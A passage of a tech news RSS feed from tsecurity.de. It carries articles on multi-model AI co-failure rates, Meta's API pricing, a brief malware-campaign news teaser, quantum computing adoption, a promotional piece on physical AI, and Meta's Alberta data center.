<description><![CDATA[A team routing queries across a coding specialist, a logic specialist, and a generalist model assumes each will cover the others' blind spots. A new study evaluating 67 frontier models from 21 providers shows that assumption is mathematically flawed — and the flaw has a name: the co-failure ceili...]]></description>
<link>https://tsecurity.de/de/3658055/it-nachrichten/enterprises-using-multiple-ai-models-are-underestimating-failure-rates-by-225x/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3658055/it-nachrichten/enterprises-using-multiple-ai-models-are-underestimating-failure-rates-by-225x/</guid>
<pubDate>Thu, 09 Jul 2026 21:02:31 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A team routing queries across a coding specialist, a logic specialist, and a generalist model assumes each will cover the others' blind spots. <a href="https://arxiv.org/abs/2606.27288">A new study</a> evaluating 67 frontier models from 21 providers shows that assumption is mathematically flawed — and the flaw has a name: the co-failure ceiling.</p><p>The assumption works like this: as long as two models don't usually fail on the exact same prompts, combining them is supposed to create a safety net against failures.</p><p>The real limit on orchestration is not how often models disagree, but the percentage of prompts where every model in the pool gives the wrong answer at once. By ignoring the co-failure ceiling, enterprises are building complex, expensive routing infrastructure to chase performance gains that do not exist. Fortunately, developers can use this same math to build a cost-free test that determines exactly when multi-model orchestration will actually pay off.</p><h2>The hidden costs of the multi-model strategy</h2><p>To orchestrate multiple language models, developers typically rely on three architectures. <a href="https://venturebeat.com/technology/new-1-5b-router-model-achieves-93-accuracy-without-costly-retraining">Model routers</a> act as traffic cops, sending complex queries to expensive models and simple queries to cheaper ones. Cascades send every prompt to a cheap model first, only escalating to a premium model if the initial system signals low confidence. Finally, approaches like <a href="https://bdtechtalks.com/2025/02/17/llm-ensembels-mixture-of-agents/">Mixture-of-Agents</a> (MoA) fuse multiple models by asking them the same question and generating a synthesized answer from their combined outputs.</p><p>These architectures introduce a "shadow price" to inference costs. Every time a development team implements a router or a cascade, they pay a premium in added system latency, complex infrastructure maintenance, and increased governance risks across multiple API providers.</p><p>To justify these operational costs, engineers rely on “pairwise error correlation” to select their model pool. Imagine a developer has Model A, which writes excellent Python but fails at SQL, and Model B, which writes excellent SQL but fails at Python. Because they fail on different types of prompts, their pairwise error correlation is low. The developer assumes that by placing a routing layer in front of them, they have created a composite system that rarely fails at coding.</p><p>According to the study, throwing diverse models together based on low correlation can actually hurt performance if the models are not equally capable — when you vote across diverse but unequal models, the weaker ones often gang up and outvote the smartest one.</p><p>Josef Chen, author of the paper, told VentureBeat that in their experiments, "Naive majority voting across unequal models had negative mean gain (minus 10 points on our hard mix): diverse-but-weaker members outvote the strong one." The actionable advice for developers is to "combine only models within a matched quality band." If you cannot match quality, take the single-model baseline and spend your budget on the best model available.</p><p>The paper provides one bright spot for this approach regarding MoA architectures. When building ensembles, teams often use "Self-MoA," where they query the same premium model multiple times to generate a synthesized answer. The researchers found that at matched quality, building a diverse ensemble of models with low pairwise correlation beats a high-correlation Self-MoA setup.</p><p>However, when teams use that same pairwise correlation metric to predict the absolute accuracy of their overall system, the math breaks down.</p><p>"So teams pay the orchestration overhead up front (latency, complexity, multi-provider operations) on the assumption that a diversity dividend arrives later," Chen said. "Usually it doesn't, because today's best models agree, and, worse, they fail on the same queries … the prompt simply carries little signal about which model will be the one that's right when the frontier disagrees."</p><h2>Why the math fails: the co-failure ceiling</h2><p>The core finding of the study centers on a metric called the "co-failure rate" — the formal name for the all-wrong scenario described above. No router, voting system, or cascade can ever achieve an accuracy higher than the ceiling it imposes.</p><p>The coding, logic, and generalist pool shows low pairwise correlation on routine prompts — they rarely fail together. But the co-failure ceiling represents the obscure, highly complex edge case that pushes past the limits of current AI architectures. If a prompt is so difficult that all three models hallucinate or fail, it does not matter how intelligently the router distributes the task. The entire pool wipes out at once.</p><p>The researchers tested their 67-model pool, which included GPT-5.5, Claude Opus 4.8, and Gemini 3.1 Pro, on the open-ended MATH-500 math benchmark. Based on standard pairwise correlation, statistical models predicted that the entire pool would wipe out simultaneously on only 2.3% of the questions. In reality, the co-failure rate was 5.2%.</p><p>Standard correlation metrics underestimated the failure rate by roughly 2.25 times. The culprit is not just independent difficulty, but a shared failure point.</p><p>"The driver is what we call a common-mode atom: a slice of queries on which the entire market fails together, which no pairwise statistic can see," Chen said. "Adding a 20th model to your pool doesn't buy tail coverage. The tail is shared."</p><p>The researchers also found that task format directly triggers co-failure. When they took graduate-level science questions from the GPQA benchmark and changed them from multiple-choice to free-response formats, the all-wrong tail expanded to 12.7%.</p><p>Developers can engineer around the ceiling, though. "The engineering implication is uncomfortable: multi-model setups buy the least exactly where teams want them most, on open-ended generation," Chen said. "Anywhere you can convert generation into verification or constrained selection (structured outputs, checkable answers, execution tests), you reopen the ceiling."</p><p>Ultimately, the researchers found this ceiling limits AI applications in two distinct ways, depending on the domain:</p><ul><li><p><b>Ceiling-bound environments (e.g., open-ended math):</b> The co-failure rate is high. The task is too hard, and all models fail simultaneously. No amount of routing can bypass the lack of underlying capability.</p></li><li><p><b>Realizability-bound environments (e.g., graduate-level science):</b> The co-failure rate is near zero, meaning at least one model in the pool usually knows the answer. However, the models disagree so subtly that a routing layer cannot reliably pick the correct answer without an omniscient oracle.</p></li></ul><h2>The $0 pre-deployment sanity check</h2><p>Before dedicating engineering hours to building a router, teams can calculate their absolute performance ceiling for free using a mathematical formula called a Clopper-Pearson bound.</p><p>The Clopper-Pearson bound operates as a worst-case scenario calculator. If you flip a coin ten times and get eight heads, you cannot guarantee the coin will land on heads 80% of the time forever. The bound takes a small sample of test questions and outputs a mathematically guaranteed ceiling.</p><p>Applied to language models, suppose a team tests a pool of five agents on 50 sample queries and finds they all fail together on just two questions. A developer might assume their multi-agent system will achieve 96% accuracy in production. The Clopper-Pearson formula corrects this optimism. It analyzes the small sample size and provides a mathematical guarantee that the true co-failure rate could actually be as high as 12%.</p><p>To use this in practice, enterprises must build a held-out dataset. A fintech company, for example, could take 200 complex customer support tickets from the previous quarter and have human agents write perfect resolutions to serve as a benchmark. While this sounds like a heavy manual project, mature engineering teams can automate the entire ceiling calculation.</p><p>"Integration is trivial: it's a counting job over eval logs teams already produce," Chen notes, "so it runs in the same CI stage as the eval suite and re-triggers whenever the model pool or the workload changes."</p><p>The engineering team then runs its candidate models against these 200 tickets once and records the results. When they want to evaluate multi-model configurations, they can use the co-failure rate measure to predict the maximum accuracy they can get from the system without running extra queries.</p><p>One important conclusion the study draws is that on tasks where answers can be definitively checked, combining models rarely beats using the single best model on the market, unless the team possesses an exceptionally strong query-level routing signal.</p><p>In an enterprise environment, a definitively checked task has an objective, zero-tolerance answer. This includes generating a SQL query that must execute without error, extracting a specific invoice total from a 50-page PDF, or formatting a JSON payload that perfectly matches a strict schema. For these tasks, enterprises are usually better off paying a premium for the smartest frontier model rather than weaving together three cheaper models and hoping a router picks the correct output. The study didn't test subjective, ungraded tasks like drafting marketing copy — the authors note that whether these findings hold outside their verifiable benchmarks remains an open question.</p><p>Because this mathematical check is free, enterprise teams can track their own co-failure rates as new models drop.</p><p>"The measurement costs nothing, so any team can track its own co-failure rate across model generations and watch whether the tail is closing," says Chen. Ultimately, "the lever buyers hold is failure-mode heterogeneity and market churn, not model count."</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The 'spectacular' Bluetti Elite 30 V2 is our favorite budget portable power station — and it just got a powerful price cut for summer]]></title>
<description><![CDATA[We tested the Elite 30 V2 from Bluetti, and it's the perfect cheap portable power station for just about everyone.]]></description>
<link>https://tsecurity.de/de/3657968/it-nachrichten/the-spectacular-bluetti-elite-30-v2-is-our-favorite-budget-portable-power-station-and-it-just-got-a-powerful-price-cut-for-summer/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3657968/it-nachrichten/the-spectacular-bluetti-elite-30-v2-is-our-favorite-budget-portable-power-station-and-it-just-got-a-powerful-price-cut-for-summer/</guid>
<pubDate>Thu, 09 Jul 2026 20:16:20 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[We tested the Elite 30 V2 from Bluetti, and it's the perfect cheap portable power station for just about everyone.]]></content:encoded>
</item>
<item>
<title><![CDATA[Best Budget Earbuds for 2026: Cheap Wireless Picks]]></title>
<description><![CDATA[I've tested dozens of inexpensive earbuds to find the best values. These are my current top bargain picks, almost all of which cost less than $100, and some less than $50.]]></description>
<link>https://tsecurity.de/de/3657872/it-nachrichten/best-budget-earbuds-for-2026-cheap-wireless-picks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3657872/it-nachrichten/best-budget-earbuds-for-2026-cheap-wireless-picks/</guid>
<pubDate>Thu, 09 Jul 2026 19:32:19 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[I've tested dozens of inexpensive earbuds to find the best values. These are my current top bargain picks, almost all of which cost less than $100, and some less than $50.]]></content:encoded>
</item>
<item>
<title><![CDATA[Meta's Muse Spark 1.1 API pricing squeezes OpenAI and Anthropic as the AI price war heats up]]></title>
<description><![CDATA[Meta is entering the AI API business with Muse Spark 1.1 at prices that undercut even the dirt-cheap Grok 4.5, released just yesterday. At $4.25 per million output tokens, Meta charges a fraction of what Anthropic or OpenAI ask. For pure-play AI labs burning through billions, the pressure just go...]]></description>
<link>https://tsecurity.de/de/3657802/ai-nachrichten/metas-muse-spark-11-api-pricing-squeezes-openai-and-anthropic-as-the-ai-price-war-heats-up/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3657802/ai-nachrichten/metas-muse-spark-11-api-pricing-squeezes-openai-and-anthropic-as-the-ai-price-war-heats-up/</guid>
<pubDate>Thu, 09 Jul 2026 19:03:12 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="2048" height="1152" src="https://the-decoder.com/wp-content/uploads/2026/07/meta_logo-2.png" class="attachment-full size-full wp-post-image" alt="" decoding="async" fetchpriority="high"></p>
<p>        Meta is entering the AI API business with Muse Spark 1.1 at prices that undercut even the dirt-cheap Grok 4.5, released just yesterday. At $4.25 per million output tokens, Meta charges a fraction of what Anthropic or OpenAI ask. For pure-play AI labs burning through billions, the pressure just got worse.</p>
<p>The article <a href="https://the-decoder.com/metas-muse-spark-1-1-api-pricing-squeezes-openai-and-anthropic-as-the-ai-price-war-heats-up/">Meta's Muse Spark 1.1 API pricing squeezes OpenAI and Anthropic as the AI price war heats up</a> appeared first on <a href="https://the-decoder.com/">The Decoder</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Vidar Stealer and XMRig Miner Campaign]]></title>
<description><![CDATA[Cybercriminals are running a dual-monetization scheme that simultaneously steals sensitive data and mines cryptocurrency on victim computers, according to research published July 7 by Unit 42, the threat intelligence division of Palo Alto Networks. This article has been indexed from…
Read more →
...]]></description>
<link>https://tsecurity.de/de/3657224/it-security-nachrichten/vidar-stealer-and-xmrig-miner-campaign/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3657224/it-security-nachrichten/vidar-stealer-and-xmrig-miner-campaign/</guid>
<pubDate>Thu, 09 Jul 2026 15:38:43 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Cybercriminals are running a dual-monetization scheme that simultaneously steals sensitive data and mines cryptocurrency on victim computers, according to research published July 7 by Unit 42, the threat intelligence division of Palo Alto Networks. This article has been indexed from…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/vidar-stealer-and-xmrig-miner-campaign/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/vidar-stealer-and-xmrig-miner-campaign/">Vidar Stealer and XMRig Miner Campaign</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI tie-in accelerates quantum usefulness, early adopters say]]></title>
<description><![CDATA[Quantum computers are still two to five years away from full-scale production, but early users like the Cleveland Clinic and Mitsubishi Chemical are already seeing benefits, particularly when quantum is used in conjunction with AI and high-performance computing.



“We are starting to see real ap...]]></description>
<link>https://tsecurity.de/de/3657220/it-security-nachrichten/ai-tie-in-accelerates-quantum-usefulness-early-adopters-say/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3657220/it-security-nachrichten/ai-tie-in-accelerates-quantum-usefulness-early-adopters-say/</guid>
<pubDate>Thu, 09 Jul 2026 15:38:38 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p><a href="https://www.networkworld.com/article/4117438/quantum-computing-is-getting-closer-but-quantum-proof-encryption-remains-elusive.html" target="_blank">Quantum computers</a> are still two to five years away from full-scale production, but early users like the Cleveland Clinic and Mitsubishi Chemical are already seeing benefits, particularly when quantum is used in conjunction with AI and high-performance computing.</p>



<p>“We are starting to see real applications of it,” says <a href="https://www.linkedin.com/in/lara-jehi-md-mhcds-67278a45/" target="_blank" rel="noreferrer noopener">Lara Jehi</a>, chief research information officer at Cleveland Clinic, and one of the keynote speakers at the <a href="https://www.alphaevents.com/events-quantumtechus/faq" target="_blank" rel="noreferrer noopener">Quantum Tech World conference in Boston</a> in late June.</p>



<p>And the technology is moving faster than anyone could have predicted, she tells <em>Network World</em>. For example, in the fall of 2024, the largest simulation that <a href="https://www.networkworld.com/article/4115513/what-enterprises-think-about-quantum-computing.html">quantum computers</a> could handle was just ten atoms, she says. “Roadmaps in the industry were hypothesizing that getting past the 10,000-atom threshold would take another five to seven years.”</p>



<p>This year, the Cleveland Clinic simulated protein complexes of <a href="https://newsroom.clevelandclinic.org/2026/05/05/cleveland-clinic-riken-and-ibm-model-a-12635-atom-protein--the-largest-known-to-be-simulated-with-quantum-computers" target="_blank" rel="noreferrer noopener">up to 12,635 atoms</a>. “We would not have been able to do the same analysis classically,” she says.</p>



<p>But even a protein of this size is still too small to be clinically relevant, she adds. For something with real-world applications, you’d need to be in the ballpark of a million atoms. And that’s not out of reach. “I think we’re very close, I’m very confident,” she says. “One or two years.”</p>



<p>And even today, by <a href="https://www.networkworld.com/article/4144645/ibm-proposes-unified-architecture-for-hybrid-quantum-classical-computing.html" target="_blank">combining quantum computing with AI running on classical computers</a>, it’s possible to do interesting work. For example, simulating how well a compound will bind to a protein in real time is too big a problem for either AI or a quantum computer to handle on its own.</p>



<p>“But AI can do a good job identifying where in that large molecule are the particular spots where you need that extra layer of accuracy,” she says. “We use classical computing up front to identify these highest tier fragments and then zoom in to those fragments with the higher resolution that quantum can provide for better simulation.”</p>



<p>Mitsubishi Chemical has been experimenting with quantum computing since 2018, for quantum chemical calculations and optimization problems, and the technology works.</p>



<p>“We want to try to have it in production use by the end of this year, or maybe the beginning of next year,” says Qi Gao, distinguished scientist in the materials design laboratory of the <a href="https://www.linkedin.com/company/mitsubishi-chemical-america/posts/" target="_blank" rel="noreferrer noopener">Mitsubishi Chemical Corporation</a> Science and Innovation Center. The first use cases will be in advanced semiconductor materials, helping design new materials for computer chips.</p>



<p>“Two-nanometer chips require high energy resolution, which is impossible for classical computer simulations,” he says. “So, we have to use quantum computers.”</p>



<p>The plan is to simulate metal oxide, which is a photo-resistant material used in etching patterns into computer chips. This is a simulation that cannot be done classically, Gao says. It will take a couple of years to fully develop the algorithms to make it work, he says, but the industry is moving towards practical business use.</p>



<p>“Every company is looking at 2028, 2029, or 2030,” he says. “We think 2028 and 2029 will be very important years in quantum computing.”</p>



<p><a href="https://www.softbank.jp/en/" target="_blank" rel="noreferrer noopener">SoftBank Corp.</a> is looking at a similar timeframe for commercializing its quantum computing offerings. The company connects customers to IBM and <a href="https://www.quantinuum.com/" target="_blank" rel="noreferrer noopener">Quantinuum</a> machines at Riken through its AI data center, with 21 pilot projects now ongoing with pilot customers.</p>



<p>“Within our AI data center, we have already built the supercomputer level,” says <a href="https://www.linkedin.com/in/nobushige-oguri-2949525/" target="_blank" rel="noreferrer noopener">Nobushige Oguri</a>, director of the quantum business planning department of the quantum technology divisions at SoftBank Corp. “It’s a world-class supercomputer, but it’s just set up for processing AI. The quantum computer will be the new accelerator to enhance current AI capability.”</p>



<p>It’s this <a href="https://www.networkworld.com/article/4131660/ibm-research-when-ai-and-quantum-merge.html" target="_blank">hybrid use</a> of AI and quantum together that will accelerate adoption, he tells <em>Network World</em>. <a href="https://www.linkedin.com/in/juliette-peyronnet05/" target="_blank" rel="noreferrer noopener">Juliette Peyronnet</a>, U.S. general manager at <a href="https://alice-bob.com/" target="_blank" rel="noreferrer noopener">Alice &amp; Bob</a>, agrees that the hybrid approach is the best bet, with quantum computers augmenting today’s technology, not replacing it.</p>



<p>“Quantum processing units are very specialized devices,” she says. “They can’t solve your everyday problems. They’re really bad at doing basic math.”</p>



<p>Instead, just like the way that CPUs do the bulk of computing work and GPUs are used for AI-related tasks, quantum processors will be used to handle the challenges that traditional computers can’t tackle.</p>



<p>“We know that quantum computers are not going to work in isolation,” she says.</p>



<h2 class="wp-block-heading">A maturing ecosystem</h2>



<p>Another sign that quantum computing is starting to move out of the laboratory and into real-world use is the emergence of a quantum ecosystem, with multiple hardware and software providers filling in all the gaps.</p>



<p>“I’ve been 15 years in field, as a researcher and now as a CEO, and it’s been changing dramatically and accelerating very fast,” says <a href="https://www.linkedin.com/in/mpestarellas/" target="_blank" rel="noreferrer noopener">Marta Estarellas</a>, CEO at <a href="https://qilimanjaro.tech/" target="_blank" rel="noreferrer noopener">Qilimanjaro Quantum Tech</a>, a quantum computing company based in Spain that makes superconducting qubits. And, today, quantum computing companies no longer need to make every single component from scratch, she says.</p>



<p>“Now what you see are a lot of spinoffs and startups starting to build different layers of the supply chain,” she tells <em>Network World</em>. “Which is great. Players like ours don’t have to think about building the full stack and can delegate to third parties—and that really helps push forward the technology.”</p>



<p>The <a href="https://iqnhub.org/event/quantum-tech-2026/" target="_blank" rel="noreferrer noopener">Quantum Tech World conference</a> showcases this ecosystem, she says. According to conference organizers, more than 1,300 people attended this year, and there were more than one hundred sponsors. Among them were multiple quantum computer makers, including <a href="https://quantumcomputinginc.com/" target="_blank" rel="noreferrer noopener">Quantum Computing Inc.,</a> a maker of room-temperature photonic computers, which ran a real-time demo of a fraud detection algorithm that beat the best classical method and scales linearly with data set size instead of quadratically. There were also software companies, consulting firms, and other specialized providers.</p>



<p>“Our booth has been packed,” says <a href="https://www.linkedin.com/in/jason-silbergleit/" target="_blank" rel="noreferrer noopener">Jason Silbergleit</a>, head of Americas at <a href="https://www.classiq.io/" target="_blank" rel="noreferrer noopener">Classiq</a>, an orchestration software company that provides an abstraction layer that makes it easier for non-scientists to build quantum applications. “More and more users want to take advantage of the platform. Even in the past six months—three months—the amount of acceleration and interest is growing.”</p>



<p>“We’re shifting from very fundamental and exploratory, building one-off kinds of systems and devices, to making things that are scalable,” says <a href="https://quantumconsortium.org/speakers/celia-merzbacher/" target="_blank" rel="noreferrer noopener">Celia Merzbacher</a>, executive director at the <a href="https://quantumconsortium.org/speakers/celia-merzbacher/" target="_blank" rel="noreferrer noopener">Quantum Economic Development Consortium</a>. “And within a timeframe that private investors and end users are willing to start to engage.”</p>



<p>The momentum is apparent on a number of fronts, she tells <em>Network World</em>. Quantum companies are getting new rounds of investment, and governments are making commitments. </p>



<p>According to a <a href="https://quantumconsortium.org/publication/2026-state-of-the-global-quantum-industry-report/" target="_blank" rel="noreferrer noopener">report</a> her organization released in April, there are now 556 pure-play quantum companies and more than 7,000 “quantum-engaged” organizations. The quantum industry saw $1.9 billion in revenues in 2025, up 30% from the year before. There was also $12.7 billion in new government funding commitments last year, up more than 300% from 2024, and $4.9 billion in new private venture capital investment, an increase of nearly 200%.</p>



<p>“And the number of people who are really rolling up their sleeves and doing the work that needs to be done to advance the hardware and the software—I think there’s just a momentum that is quite visible,” she says.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Physical AI will see the fusion of robotics and AI transform the world]]></title>
<description><![CDATA[Historically, humans have solved their toughest tasks by creating tools capable of withstanding greater strain to undertake the job or augment their abilities. From levers to steam engines and beyond, the structural evolution of machines is almost as remarkable as their ability to improve operati...]]></description>
<link>https://tsecurity.de/de/3656811/it-nachrichten/physical-ai-will-see-the-fusion-of-robotics-and-ai-transform-the-world/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3656811/it-nachrichten/physical-ai-will-see-the-fusion-of-robotics-and-ai-transform-the-world/</guid>
<pubDate>Thu, 09 Jul 2026 13:17:15 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Historically, humans have solved their toughest tasks by creating tools capable of withstanding greater strain to undertake the job or augment their abilities. From levers to steam engines and beyond, the structural evolution of machines is almost as remarkable as their ability to improve operational cultures.</p>



<p>In recent times, we have seen machines attain their highest structural complexity, productivity, and best aesthetics yet. The most relevant new technologies today focus on creating high-throughput physical machines and software that ‘thinks’, and, more futuristically, a fusion of both.</p>



<h2 class="wp-block-heading">From moving machines to intelligent humanoids</h2>



<p>Evolving from ‘moving machines’ capable of handling repetitive tasks to intelligent machines is a century-long goal for robotics. The rapid growth in this sector over the past half-decade, with a <a href="https://www.mordorintelligence.com/industry-reports/robotics-market" target="_blank" rel="noreferrer noopener">$218 billion projection for 2031</a>, is driven by expectations that advancements in AI will extend to robotics and expedite the development of intelligent robots.</p>



<p>Current prototypes are robots capable of taking initiatives or executing tasks more efficiently with less supervision. These have been applied in agriculture, industrial-grade production, and healthcare.</p>



<p>Humanoid robots have attracted the most attention due to the excitement around their potential as near-human machines and the signals their development sends for the future of human-machine coexistence.</p>



<p>Tech leaders around the world are contributing to advancing physical AI with optimism about the impact of robotics on humanity.</p>



<p>Physical AI is a department of artificial intelligence specializing in developing AI algorithms and models for locomotive systems. This includes every kind of robot and, at a more advanced level, humans.</p>



<p>Recent developments in this field include <a href="https://x.com/Figure_robot/status/2059350969700491632" target="_blank" rel="noreferrer noopener">Figure AI’s humanoid robot deployments</a> and Tether’s investment in the <a href="https://tether.io/news/tether-to-lead-neura-robotics-series-c-financing-one-of-the-largest-up-to-1-4bn-robotics-physical-ai-investment-rounds-on-record-to-power-the-financial-and-intelligence-layer/" target="_blank" rel="noreferrer noopener">NEURA</a>, leading the fundraising of up to $1.4 billion in one of the largest robotics and physical AI investment rounds on record.</p>



<p>Physical AI researchers are exploring future-proof strategies to develop intelligent, safe humanoid robots that can collaborate with humans, undertake humanly impossible tasks, and handle routine tasks more efficiently.</p>



<p>The strongest case for AI-powered humanoid robots is that they complement human power. A <a href="https://reports.weforum.org/docs/WEF_Physical_AI_Powering_the_New_Age_of_Industrial_Operations_2025.pdf" target="_blank" rel="noreferrer noopener">World Economic Forum (WEF)</a> report projects shifts in work roles. Humanoid robots increase the workforce, take over repetitive, strenuous, and boring roles, allowing humans to pursue more interesting career paths.</p>



<p>This way, superintelligent humanoid robots will lead sector-wide transformations beyond current imagination and uniquely transform the world.</p>



<p>In theory, it creates the ideal conditions for an improved global economy and a higher quality of life. This theory is challenged by the dystopian vision of a machine-dominated world in which humans become less relevant. However, history suggests otherwise. Every major wave of automation, from the industrial revolution to the rise of computers, initially sparked fears of human redundancy. Yet each ultimately created more opportunities than it eliminated.</p>



<h2 class="wp-block-heading">Super-human advancements with physical AI</h2>



<p>In ideal operations, physical AI will serve as a lever for humans as well. While progress in robotics is loudest, efforts to directly augment human abilities with physical AI are also yielding remarkable results. Brain-computer interfaces can now <a href="https://techcrunch.com/sponsor/tether/tether-is-setting-the-standards-forbrain-to-text-speech-decoding-withai-augmented-bci-implants/" target="_blank" rel="noreferrer noopener">accurately decode speech in paralyzed and speech-impaired</a> individuals through intracortical implants that detect brain activity. And this is only a ‘start’. Projections from leaders in this space give insight into the trajectory of this technology.</p>



<p>In a recent <a href="https://www.youtube.com/watch?v=rKZ3LPLF2-A" target="_blank" rel="noreferrer noopener">fireside chat</a> with NEURA Robotics CEO and founder David Reger, Tether CEO Paolo Ardoino noted, <em>“the evolution of robotics that Neura is making is going to allow testing and building of a framework[…] where the real impact is in the real world. Everything starts digital, but to see the true potential, we will see robots roaming the streets, helping people, and being part of society. It has to happen safely, it has to be transparent.”</em></p>



<p>Physical AI products designed for direct human integration are being developed differently, with a focus on ergonomics, a minimalist aesthetic, and performance. <a href="https://tether.io/evo/" target="_blank" rel="noreferrer noopener">EVO</a>, Tether’s arm leading the charge for human advancement through intelligent technologies, also shared plans for non-invasive implants that maintain high productivity and offer greater composability.</p>



<p>Technologies like these will allow humans to leverage high-level physical AI technologies to attain the same technical abilities as humanoid robots and outperform them by combining machine and raw human intelligence.</p>



<h2 class="wp-block-heading">AI robotics in non-user-controlled infrastructures</h2>



<p>Resource efficiency, data sovereignty, and surveillance are some of the biggest ethical considerations of Physical AI after safety and responsibility. The infrastructure line-up for Software and Physical AI relies heavily on managed systems, blurring the lines of control and governance.</p>



<p>Who is really in charge? The end user, developer, or proprietors of the centralized infrastructure that powers the product? The result is a product with multiple points of failure, disruptions, and most importantly, operational risks.</p>



<p>Physical AI solutions will be used by billions of people worldwide; they should therefore not be built on limited, slow, and centralized infrastructures. This necessitates localized or truly decentralized AI solutions. Local-first AI solutions like <a href="https://qvac.tether.io/" target="_blank" rel="noreferrer noopener">Tether’s QVAC</a> also prioritize resource efficiency, since users are expected to provide the core infrastructure. QVAC is a modular, highly efficient, local-first AI platform that runs anywhere. Tether regards it as the invisible intelligence engine of the 21st century.</p>



<h2 class="wp-block-heading">Open-sourcing and aligning intelligent robots for co-existence with humans</h2>



<p>Yann LeCun, Chief AI scientist at Meta, <a href="https://observer.com/2025/07/metas-yann-lecun-defends-open-source-a-i-amid-geopolitical-tension/" target="_blank" rel="noreferrer noopener">notes</a> that open-sourcing AI development is the answer to the most pressing ethical challenges of AI applications. According to LeCun:</p>



<p><em>“The magic of open research is that you accelerate progress by involving more people[…] the biggest danger of AI isn’t ‘bad behavior’ […] It’s that every digital interaction in our future will be mediated by AI. In that world, diverse open-source systems let users choose their own biases.”</em></p>



<p>Open-sourced (systemic decentralization) and local-first (Infrastructural decentralization) solutions are the only path to developing ethically aligned Physical AI capable of co-existing with humans as intended. A successful physical AI solution is expected to tick the check boxes of safety, resource efficiency, true user control, and tamper-proofness. To do this, it must embrace transparent development procedures and function without gatekeepers.</p>



<p></p>



<p><strong>Learn how </strong><a href="https://tether.io/evo/" target="_blank" rel="noreferrer noopener"><strong>Tether EVO</strong></a><strong> is building resilient technology built on fairness, inclusivity, and systems with zero points of failure.</strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Meta To Build $9 Billion Alberta Data Center, Its First In Canada]]></title>
<description><![CDATA[Meta will build its first Canadian data center in Alberta, investing $9 billion in a 1-gigawatt facility that can scale to 1.8 gigawatts to support its AI infrastructure needs. The project will rely on new generation and grid infrastructure funded by Meta, including a long-term agreement tied to ...]]></description>
<link>https://tsecurity.de/de/3656778/it-security-nachrichten/meta-to-build-9-billion-alberta-data-center-its-first-in-canada/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3656778/it-security-nachrichten/meta-to-build-9-billion-alberta-data-center-its-first-in-canada/</guid>
<pubDate>Thu, 09 Jul 2026 13:08:07 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Meta will build its first Canadian data center in Alberta, investing $9 billion in a 1-gigawatt facility that can scale to 1.8 gigawatts to support its AI infrastructure needs. The project will rely on new generation and grid infrastructure funded by Meta, including a long-term agreement tied to a new natural gas power facility. The company says it will offset electricity use with clean and renewable energy investments. Reuters reports: Meta has doubled down on AI, pledging hundreds of billions of dollars to build large AI data centers in the U.S. The Alberta announcement represents the company's 33rd data center globally. Executives made the announcement in Calgary alongside Premier Danielle Smith and other Alberta government officials, who have spent several years courting Silicon Valley tech giants with the aim of spurring a large-scale investment in the oil-and-gas province. Alberta's technology minister, Nate Glubish, told reporters there are currently several other gigawatt-scale data center proposals in various stages of development in the province. "This is the first of its kind, the first of its size, the first of its scale, but it won't be the last," Glubish said.
 
Meta, like other tech giants, is facing rapidly expanding power needs due to the growth of AI, and Alberta is rich in natural gas which sells at a significant discount to the U.S. benchmark. The province's cold climate also makes cooling the massive super-computers and related data center infrastructure more cost-efficient. The 20 existing small- to mid-scale data centers in Alberta already pull from the province's energy grid, which is 60% powered by natural gas. The provincial government is giving new proponents the option to build their own power sources to avoid limits on power capacity. Meta said Wednesday it will fully fund new generation and grid infrastructure for its Alberta data center, which will consume about as much electricity as 800,000 homes. Gary Demasi, Meta's vice president for data center development, said the company will offset that electricity use by investing in clean and renewable energy. He also said the data center will use a closed-loop liquid cooling system, meaning its total water use will be less than that of a typical golf course.
 
[...] The company has partnered with Alberta-based Pembina Pipeline , which announced last week it will go ahead with its Greenlight Electricity Centre, a new natural gas-fired power-generation facility in Sturgeon County which will be in service in late 2030 and with which Meta has a long-term tolling agreement. Until that project is operational and for the next decade, Alberta-based power producer Capital Power will provide 250 megawatts of electricity for the site using its existing natural gas-fired fleet. The project will require approximately 150 million cubic feet per day of natural gas, according to Pembina, helping to create demand for Western Canadian natural gas producers.<p></p><div class="share_submission">
